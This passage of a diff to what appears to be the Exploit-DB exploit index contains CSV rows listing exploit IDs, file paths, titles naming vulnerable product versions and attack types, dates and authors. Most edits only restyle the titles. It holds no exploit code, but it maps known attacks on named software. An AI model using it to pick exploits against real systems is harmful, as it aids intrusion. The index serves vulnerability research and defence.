Gonzalez",cgi,webapps,0 29222,platforms/php/webapps/29222.txt,"Cerberus Helpdesk 2.x - Spellwin.php Cross-Site Scripting",2006-12-04,"En Douli",php,webapps,0 @@ -30576,11 +30579,11 @@ id,file,description,date,author,platform,type,port 30022,platforms/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps,0 30027,platforms/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps,0 30028,platforms/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,php,webapps,0 -29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - (class.utilitycontroller.php) PHP Object Injection",2013-11-08,EgiX,php,webapps,80 +29512,platforms/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection",2013-11-08,EgiX,php,webapps,80 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - (objectDetail.php objectId Parameter) SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php objectId Parameter' SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 @@ -30954,8 +30957,8 @@ id,file,description,date,author,platform,type,port 30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/Management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php' g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php password0 Parameter' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php language Parameter' SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 @@ -31000,7 +31003,7 @@ id,file,description,date,author,platform,type,port 30235,platforms/php/webapps/30235.txt,"KikChat - Local File Inclusion / Remote Code Execution",2013-12-12,cr4wl3r,php,webapps,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 -30246,platforms/php/webapps/30246.txt,"WHMCS 4.x / 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 +30246,platforms/php/webapps/30246.txt,"WHMCompleteSolution (WHMCS) 4.x / 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 30248,platforms/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,hardware,webapps,0 30249,platforms/php/webapps/30249.txt,"Papoo 1.0.3 - Plugin.php Authentication Bypass",2007-06-27,"Nico Leidecker",php,webapps,0 30250,platforms/asp/webapps/30250.txt,"DUClassmate 1.x - ICity Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 @@ -31290,7 +31293,7 @@ id,file,description,date,author,platform,type,port 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - translator.php dir Parameter Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 -30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - (translator.php) upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 +30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - 'translator.php' upd cmd Action edit Variable Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 - integrator.php lang Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php' target Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar 3.3.8 - command.php Modify User Action uid Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 @@ -31819,7 +31822,7 @@ id,file,description,date,author,platform,type,port 31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 - include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID Parameter) SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - 'geo_zones.php zID Parameter' SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 @@ -31959,7 +31962,7 @@ id,file,description,date,author,platform,type,port 31733,platforms/ios/webapps/31733.txt,"My PDF Creator & DE DM 1.4 iOS - Multiple Vulnerabilities",2014-02-18,Vulnerability-Lab,ios,webapps,50496 32240,platforms/php/webapps/32240.txt,"Freeway 1.4.1 - Multiple Input Validation Vulnerabilities",2008-08-13,"Digital Security Research Group",php,webapps,0 31734,platforms/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",php,webapps,80 -31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - (index.php cID Parameter) SQL Injection",2014-02-18,killall-9,php,webapps,80 +31735,platforms/php/webapps/31735.txt,"Concrete5 5.6.2.1 - 'index.php cID Parameter' SQL Injection",2014-02-18,killall-9,php,webapps,80 31738,platforms/php/webapps/31738.py,"Open Web Analytics 1.5.4 - (owa_email_address Parameter) SQL Injection",2014-02-18,"Dana James Traversie",php,webapps,0 31739,platforms/php/webapps/31739.txt,"TLM CMS 1.1 - 'index.php' Multiple SQL Injection",2008-05-05,ZoRLu,php,webapps,0 31740,platforms/php/webapps/31740.html,"LifeType 1.2.8 - 'admin.php' Cross-Site Scripting",2008-05-05,"Khashayar Fereidani",php,webapps,0 @@ -31978,7 +31981,7 @@ id,file,description,date,author,platform,type,port 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081 -31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware v5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 +31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378 31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80 31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0 @@ -32030,7 +32033,7 @@ id,file,description,date,author,platform,type,port 31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0 32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0 31833,platforms/php/webapps/31833.txt,"ILIAS 4.4.1 - Multiple Vulnerabilities",2014-02-22,HauntIT,php,webapps,80 -31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - (clicktracker.php track Parameter) SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 +31834,platforms/php/webapps/31834.txt,"WordPress Plugin AdRotate 3.9.4 - 'clicktracker.php track Parameter' SQL Injection",2014-02-22,"High-Tech Bridge SA",php,webapps,80 31835,platforms/php/webapps/31835.txt,"Apple Safari Montage 3.1.3 - 'forgotPW.php' Multiple Cross-Site Scripting Vulnerabilities",2008-05-22,"Omer Singer",php,webapps,0 31836,platforms/php/webapps/31836.txt,"WordPress Plugin Upload File - 'wp-uploadfile.php' SQL Injection",2008-05-24,eserg.ru,php,webapps,0 31837,platforms/php/webapps/31837.txt,"DZOIC Handshakes 3.5 - 'fname' Parameter SQL Injection",2008-05-24,"Ali Jasbi",php,webapps,0 @@ -32095,11 +32098,11 @@ id,file,description,date,author,platform,type,port 31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 31947,platforms/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 - SQL Injection",2008-06-22,His0k4,php,webapps,0 31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 -31949,platforms/php/webapps/31949.txt,"Chipmunk Blog - members.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 -31950,platforms/php/webapps/31950.txt,"Chipmunk Blog - comments.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 -31951,platforms/php/webapps/31951.txt,"Chipmunk Blog - photos.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 -31952,platforms/php/webapps/31952.txt,"Chipmunk Blog - archive.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 -31953,platforms/php/webapps/31953.txt,"Chipmunk Blog - cat.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 +31949,platforms/php/webapps/31949.txt,"Chipmunk Blog - 'members.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 +31950,platforms/php/webapps/31950.txt,"Chipmunk Blog - 'comments.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 +31951,platforms/php/webapps/31951.txt,"Chipmunk Blog - 'photos.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 +31952,platforms/php/webapps/31952.txt,"Chipmunk Blog - 'archive.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 +31953,platforms/php/webapps/31953.txt,"Chipmunk Blog - 'cat.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 31954,platforms/php/webapps/31954.txt,"Benja CMS 0.1 - /admin/admin_edit_submenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 31955,platforms/php/webapps/31955.txt,"Benja CMS 0.1 - /admin/admin_new_submenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 31956,platforms/php/webapps/31956.txt,"Benja CMS 0.1 - /admin/admin_edit_topmenu.php URL Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps,0 @@ -32121,7 +32124,7 @@ id,file,description,date,author,platform,type,port 32134,platforms/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps,0 31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 31986,platforms/php/webapps/31986.txt,"WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy Parameter) SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php SortBy Parameter' SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 31993,platforms/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080 @@ -32238,7 +32241,7 @@ id,file,description,date,author,platform,type,port 32151,platforms/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps,0 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php Filename Parameter) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php Filename Parameter' Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 @@ -32435,7 +32438,7 @@ id,file,description,date,author,platform,type,port 32509,platforms/php/webapps/32509.txt,"Kemana Directory 1.5.6 - Database Backup Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32510,platforms/php/webapps/32510.txt,"Kemana Directory 1.5.6 - (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit",2014-03-25,LiquidWorm,php,webapps,0 32511,platforms/php/webapps/32511.txt,"qEngine CMS 6.0.0 - Multiple Vulnerabilities",2014-03-25,LiquidWorm,php,webapps,80 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i Parameter) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - 'xhr.php i Parameter' SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 32523,platforms/php/webapps/32523.txt,"UC Gateway Investment SiteEngine 5.0 - 'api.php' URI redirection",2008-10-23,xuanmumu,php,webapps,0 32524,platforms/php/webapps/32524.txt,"UC Gateway Investment SiteEngine 5.0 - 'announcements.php' SQL Injection",2008-10-23,xuanmumu,php,webapps,0 @@ -32705,7 +32708,7 @@ id,file,description,date,author,platform,type,port 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - (sorter.php sorter_value Parameter) SQL Injection",2014-04-22,chapp,php,webapps,80 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.php sorter_value Parameter' SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 @@ -32720,7 +32723,7 @@ id,file,description,date,author,platform,type,port 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Plugin Work-The-Flow 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - (dompdf.php read Parameter) Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - 'dompdf.php read Parameter' Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection / Cross-Site Scripting",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 @@ -33369,7 +33372,7 @@ id,file,description,date,author,platform,type,port 34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 - HTML Injection / Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34243,platforms/ios/webapps/34243.txt,"Photo WiFi Transfer 1.01 - Directory Traversal",2014-08-02,Vulnerability-Lab,ios,webapps,8080 -34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 - (data.php) Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 +34245,platforms/php/webapps/34245.txt,"ArticleFR 11.06.2014 - 'data.php' Privilege Escalation",2014-08-02,"High-Tech Bridge SA",php,webapps,80 34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0 34250,platforms/php/webapps/34250.txt,"Joomla! Component Canteen 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps,0 34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps,0 @@ -33477,7 +33480,7 @@ id,file,description,date,author,platform,type,port 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - Cross-Site Scripting Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - (search.php cat Parameter) SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x < 4.1.2 - 'search.php cat Parameter' SQL Injection",2014-09-03,D35m0nd142,php,webapps,80 34424,platforms/php/webapps/34424.txt,"WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 @@ -33773,7 +33776,7 @@ id,file,description,date,author,platform,type,port 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 -34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - (joblogs.php jobid Parameter) SQL Injection",2014-10-02,wishnusakti,php,webapps,80 +34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php jobid Parameter' SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 34854,platforms/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,php,webapps,80 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",php,webapps,80 @@ -33912,7 +33915,7 @@ id,file,description,date,author,platform,type,port 35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting",2014-10-27,Vulnerability-Lab,ios,webapps,0 35084,platforms/php/webapps/35084.txt,"WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro - 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 -35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 +35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) - 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 35088,platforms/php/webapps/35088.txt,"PHP State - 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 35089,platforms/php/webapps/35089.txt,"Joomla! Component Jeformcr - 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 @@ -33993,7 +33996,7 @@ id,file,description,date,author,platform,type,port 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 -35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate Parameter) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 +35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - 'picture.php rate Parameter' SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35218,platforms/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 35220,platforms/multiple/webapps/35220.txt,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 @@ -34085,7 +34088,7 @@ id,file,description,date,author,platform,type,port 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 -35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - (dosearch.php words_exact Parameter) SQL Injection",2014-11-25,bard,php,webapps,80 +35365,platforms/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php words_exact Parameter' SQL Injection",2014-11-25,bard,php,webapps,80 35367,platforms/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35371,platforms/php/webapps/35371.txt,"WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 @@ -34142,7 +34145,7 @@ id,file,description,date,author,platform,type,port 35459,platforms/php/webapps/35459.txt,"WordPress Plugin Cart66 Lite eCommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 35460,platforms/php/webapps/35460.txt,"WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download",2014-12-03,"QK14 